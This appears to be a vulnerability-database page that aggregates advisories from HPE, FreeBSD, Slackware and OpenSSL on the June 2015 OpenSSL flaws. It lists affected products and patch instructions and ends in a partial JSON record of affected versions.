- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
5700 (Comware 7) - Version: R2422P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
5930 (Comware 7) - Version: R2422P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HSR6600 (Comware 7) - Version: R7103P05
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
HSR6800 (Comware 7) - Version: R7103P05
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
1950 (Comware 7) - Version: R3109P16
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
7500 (Comware 7) - Version: R7170
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit

iMC Products

iMC Plat - Version: iMC Plat 7.1 E0303P16
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU
- JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU
- JG659AAE HP IMC Smart Connect VAE E-LTU
- JG660AAE HP IMC Smart Connect w/WLM VAE E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU
- JG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
iMC iNode - Version: iNode PC 7.1 E0313, or, iNode PC 7.2 (E0401)
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
iMC TAM_UAM - Version: iMC UAM_TAM 7.1 (E0307)
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
iMC NSM - Version: iMC WSM 7.1 E0303P10
- HP Network Products
- JD456A HP IMC WSM Software Module with 50-Access Point License
- JF414A HP IMC Wireless Service Manager Software Module with 50-Access Point License
- JF414AAE HP IMC Wireless Service Manager Software Module with 50-Access Point E-LTU
- JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager Module Upgrade with 250 Access Point E-LTU
- JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU
- JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg with 250-node E-LTU

VCX Products

VCX - Version: 9.8.18
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0

HISTORY Version:1 (rev.1) - 5 July 2016 Initial release

Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

============================================================================= FreeBSD-SA-15:10.openssl Security Advisory The FreeBSD Project

Topic: Multiple OpenSSL vulnerabilities

Category: contrib Module: openssl Announced: 2015-06-12 Affects: All supported versions of FreeBSD. Corrected: 2015-06-11 19:07:45 UTC (stable/10, 10.1-STABLE) 2015-06-12 07:23:55 UTC (releng/10.1, 10.1-RELEASE-p12) 2015-06-11 19:39:27 UTC (stable/9, 9.3-STABLE) 2015-06-12 07:23:55 UTC (releng/9.3, 9.3-RELEASE-p16) 2015-06-11 19:39:27 UTC (stable/8, 8.4-STABLE) 2015-06-12 07:23:55 UTC (releng/8.4, 8.4-RELEASE-p30) CVE Name: CVE-2015-1788, CVE-2015-1789, CVE-2015-1790, CVE-2015-1791 CVE-2015-1792, CVE-2015-4000

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

I. Background

II. [CVE-2015-1791]

The OpenSSL advisory also describes a problem that is identified as CVE-2014-8176, which is already fixed by an earlier FreeBSD Errata Notice, FreeBSD-EN-15:02.openssl.

III. [CVE-2015-4000]. [CVE-2015-1788]. This affects FreeBSD 10.1 only, as the problem was no longer exist in OpenSSL 0.9.8 series since July 2012. [CVE-2015-1790]. [CVE-2015-1792]

An attacker may be able to crash multi-thread applications that supports resumed TLS handshakes. [CVE-2015-1791]

IV. Workaround

No workaround is available.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 10.1]

fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-10.1.patch

fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-10.1.patch.asc

gpg --verify openssl-10.1.patch.asc

[FreeBSD 9.3 and 8.4]

fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-8.4.patch

fetch https://security.FreeBSD.org/patches/SA-15:10/openssl-8.4.patch.asc

gpg --verify openssl-8.4.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in .

Restart all deamons using the library, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/8/ r284286 releng/8.4/ r284295 stable/9/ r284286 releng/9.3/ r284295 stable/10/ r284285 releng/10.1/ r284295

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. References

The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.4 (FreeBSD)

iQIcBAEBCgAGBQJVeopGAAoJEO1n7NZdz2rnzhQP/Ak6el188Y+7QbEYVfCZ7eG8 BQLj5TMGHV5swSKVlPcEuBlMwTjpgB5Gqhc8luDS0eIAuJGdcMPSrZDdXxWQFtPf pbfIwp/ElFc7d6ut0Y8t6fFLJbhTOoHJpzTGkFRfJkjinGOx7OZQPeLJsxSubbnL JKugZ3diH6yk6IPMf9SvhO/kYXUF1VbXQvHNTnqgdhFVkgF6tK22Pkl2XoJ9EHbh vBXft1yJwiYlZ//DxZuScTUj1pHYzK3bOpg//REJMWCMj1RVwQr2EyDa0Q2cT02d eRnSZykXD69eybyzEck+BvwnUYYJICimnHuE5t78UIr0D/NWyOAZTQ99z5TID5aV HXkcil+1E/Q+xBB4+5UOOnESf6cmiWwewQOVvD26ZY39E6oJXvsrWnyxIuCG6DL9 sLtxB6iTYlTX5Civ/VJX8H7rFiw4UwMembthvGzck22026iHjplWM3GCWz0E8O3R PrXBHjAzNFawK3owNMxFSUFTuFw/qY7EEwJ3SKCEC+hoxcLOl26NMxrQKRIAUk+I MMOaZfvOh2uM19y9SJZz8+sqU8gIm7ihDm5fuSkO8kY0jdvLwyS9bXAejN/lZ6oJ TyfTDDyXDOdaPpnpQehh6vQV0NiaJ+WXfGhfiE8/G/t6b1E0LlCaaGJTpYkildGe vVCM4Nyx4S9WDFOi76ug =dyhg -----END PGP SIGNATURE----- .

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1n-i486-1_slack14.1.txz: Upgraded. Fixes several bugs and security issues: o Malformed ECParameters causes infinite loop (CVE-2015-1788) o Exploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789) o PKCS7 crash with missing EnvelopedContent (CVE-2015-1790) o CMS verify infinite loop with unknown hash function (CVE-2015-1792) o Race condition handling NewSessionTicket (CVE-2015-1791) For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1788 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1790 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1792 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1791 ( Security fix ) patches/packages/openssl-solibs-1.0.1n-i486-1_slack14.1.txz: Upgraded. +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zg-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.0.txz

Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.0.txz

Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zg-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.1.txz

Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.1.txz

Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zg-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zg-i486-1_slack13.37.txz

Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zg-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zg-x86_64-1_slack13.37.txz

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1n-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1n-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1n-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1n-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1n-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1n-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1n-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1n-x86_64-1_slack14.1.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1n-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1n-i586-1.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1n-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1n-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 13.0 packages: 383ecfed6bfef1440a44d7082745848a openssl-0.9.8zg-i486-1_slack13.0.txz fb186187ffa200e22d9450a9d0e321f6 openssl-solibs-0.9.8zg-i486-1_slack13.0.txz

Slackware x86_64 13.0 packages: eb52318ed52fef726402f0b2a74745c5 openssl-0.9.8zg-x86_64-1_slack13.0.txz 9447927b960a01b21149e28a9783021f openssl-solibs-0.9.8zg-x86_64-1_slack13.0.txz

Slackware 13.1 packages: 37f46f6b4fe2acbe217eaf7c0b33b704 openssl-0.9.8zg-i486-1_slack13.1.txz 986de2e71676f61d788a59a1e0c8de1f openssl-solibs-0.9.8zg-i486-1_slack13.1.txz

Slackware x86_64 13.1 packages: 6b160ce817dcde3ae5b3a861b284387b openssl-0.9.8zg-x86_64-1_slack13.1.txz 503d891680c711162386ea7e3daadca8 openssl-solibs-0.9.8zg-x86_64-1_slack13.1.txz

Slackware 13.37 packages: 5e7501b1d73d01d3d87704c3cfd3a888 openssl-0.9.8zg-i486-1_slack13.37.txz 874f0b59870dd3f259640c9930a02f99 openssl-solibs-0.9.8zg-i486-1_slack13.37.txz

Slackware x86_64 13.37 packages: b6d91614458040d461dff3c3eab45206 openssl-0.9.8zg-x86_64-1_slack13.37.txz be106df5e59c2be7fa442df8ba85ad0b openssl-solibs-0.9.8zg-x86_64-1_slack13.37.txz

Slackware 14.0 packages: ee7c3937e6a6d7ac7537f751af7da7b9 openssl-1.0.1n-i486-1_slack14.0.txz 758662437d33f99ec0a686cedeb1919e openssl-solibs-1.0.1n-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: 2dfdc4729e93cf460018e9e30a6223dc openssl-1.0.1n-x86_64-1_slack14.0.txz 9cb4b34e97e60f6bfe4c843aabeae954 openssl-solibs-1.0.1n-x86_64-1_slack14.0.txz

Slackware 14.1 packages: 5a9bf08d55615cfc097109c2e3786f7b openssl-1.0.1n-i486-1_slack14.1.txz fb1c05468e5c38d51a8ff6ac435e3a20 openssl-solibs-1.0.1n-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 1ef5cede3f954c3e4741012ffa76b750 openssl-1.0.1n-x86_64-1_slack14.1.txz ea22c288c60ae1d7ea8c5b3a1608462b openssl-solibs-1.0.1n-x86_64-1_slack14.1.txz

Slackware -current packages: 56db8712d653c060f910e8915a8f8656 a/openssl-solibs-1.0.1n-i586-1.txz 6d6264c9943e27240db5c8f5ec342e27 n/openssl-1.0.1n-i586-1.txz

Slackware x86_64 -current packages: e73f7aff5aa0ad14bc06428544f99ae2 a/openssl-solibs-1.0.1n-x86_64-1.txz 91b550b9eb0ac0c580e158375a93c0e4 n/openssl-1.0.1n-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg openssl-1.0.1n-i486-1_slack14.1.txz openssl-solibs-1.0.1n-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

Please download the latest version of HPE Version Control Repository Manager (VCRM) (7.5.1) from the following location:

VCRM for Windows:

https://www.hp.com/swpublishing/MTX-b59b11be53744759a650eadeb4

VCRM for Linux is only available only with HPE Systems Insight Manager (HPE SIM):

https://www.hp.com/go/sim

HISTORY Version:1 (rev.1) - 12 May 2016 Initial release

DHE man-in-the-middle protection (Logjam)

A vulnerability in the TLS protocol allows a man-in-the-middle attacker to downgrade vulnerable TLS connections using ephemeral Diffie-Hellman key exchange to 512-bit export-grade cryptography. This vulnerability is known as Logjam (CVE-2015-4000).

OpenSSL has added protection for TLS clients by rejecting handshakes with DH parameters shorter than 768 bits. This limit will be increased to 1024 bits in a future release.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n

Fixes for this issue were developed by Emilia Käsper and Kurt Roeckx of the OpenSSL development team.

This can be used to perform denial of service against any system which processes public keys, certificate requests or certificates. This includes TLS clients and TLS servers with client authentication enabled.

This issue affects OpenSSL versions: 1.0.2 and 1.0.1. Recent 1.0.0 and 0.9.8 versions are not affected. 1.0.0d and 0.9.8r and below are affected.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n OpenSSL 1.0.0d (and below) users should upgrade to 1.0.0s OpenSSL 0.9.8r (and below) users should upgrade to 0.9.8zg

This issue was reported to OpenSSL on 6th April 2015 by Joseph Birr-Pixton. The fix was developed by Andy Polyakov of the OpenSSL development team.

Exploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789)

Severity: Moderate

X509_cmp_time does not properly check the length of the ASN1_TIME string and can read a few bytes out of bounds. In addition, X509_cmp_time accepts an arbitrary number of fractional seconds in the time string.

An attacker can use this to craft malformed certificates and CRLs of various sizes and potentially cause a segmentation fault, resulting in a DoS on applications that verify certificates or CRLs. TLS clients that verify CRLs are affected. TLS clients and servers with client authentication enabled may be affected if they use custom verification callbacks.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n OpenSSL 1.0.0 users should upgrade to 1.0.0s OpenSSL 0.9.8 users should upgrade to 0.9.8zg

This issue was reported to OpenSSL on 8th April 2015 by Robert Swiecki (Google), and independently on 11th April 2015 by Hanno Böck. The fix was developed by Emilia Käsper of the OpenSSL development team.

PKCS7 crash with missing EnvelopedContent (CVE-2015-1790)

Severity: Moderate

The PKCS#7 parsing code does not handle missing inner EncryptedContent correctly. An attacker can craft malformed ASN.1-encoded PKCS#7 blobs with missing content and trigger a NULL pointer dereference on parsing.

Applications that decrypt PKCS#7 data or otherwise parse PKCS#7 structures from untrusted sources are affected. OpenSSL clients and servers are not affected.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n OpenSSL 1.0.0 users should upgrade to 1.0.0s OpenSSL 0.9.8 users should upgrade to 0.9.8zg

This issue was reported to OpenSSL on 18th April 2015 by Michal Zalewski (Google). The fix was developed by Emilia Käsper of the OpenSSL development team.

CMS verify infinite loop with unknown hash function (CVE-2015-1792)

Severity: Moderate

When verifying a signedData message the CMS code can enter an infinite loop if presented with an unknown hash function OID.

This can be used to perform denial of service against any system which verifies signedData messages using the CMS code.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n OpenSSL 1.0.0 users should upgrade to 1.0.0s OpenSSL 0.9.8 users should upgrade to 0.9.8zg

This issue was reported to OpenSSL on 31st March 2015 by Johannes Bauer. The fix was developed by Dr. Stephen Henson of the OpenSSL development team.

Race condition handling NewSessionTicket (CVE-2015-1791)

Severity: Low

If a NewSessionTicket is received by a multi-threaded client when attempting to reuse a previous ticket then a race condition can occur potentially leading to a double free of the ticket data.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2b OpenSSL 1.0.1 users should upgrade to 1.0.1n OpenSSL 1.0.0 users should upgrade to 1.0.0s OpenSSL 0.9.8 users should upgrade to 0.9.8zg

This issue was discovered by Emilia Käsper of the OpenSSL development team. The fix was developed by Matt Caswell of the OpenSSL development team.

Invalid free in DTLS (CVE-2014-8176)

Severity: Moderate

This vulnerability does not affect current versions of OpenSSL. It existed in previous OpenSSL versions and was fixed in June 2014.

If a DTLS peer receives application data between the ChangeCipherSpec and Finished messages, buffering of such data may cause an invalid free, resulting in a segmentation fault or potentially, memory corruption.

This issue affected older OpenSSL versions 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.

This issue was originally reported on March 28th 2014 in https://rt.openssl.org/Ticket/Display.html?id=3286 by Praveen Kariyanahalli, and subsequently by Ivan Fratric and Felix Groebert (Google). A fix was developed by zhu qun-ying.

The fix for this issue can be identified by commits bcc31166 (1.0.1), b79e6e3a (1.0.0) and 4b258e73 (0.9.8).

Note

References

URL for this Security Advisory: https://www.openssl.org/news/secadv_20150611.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201506-0231",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "openssl",
        "version": "1.0.0e"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "15.1"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0p"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0q"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0k"
      },
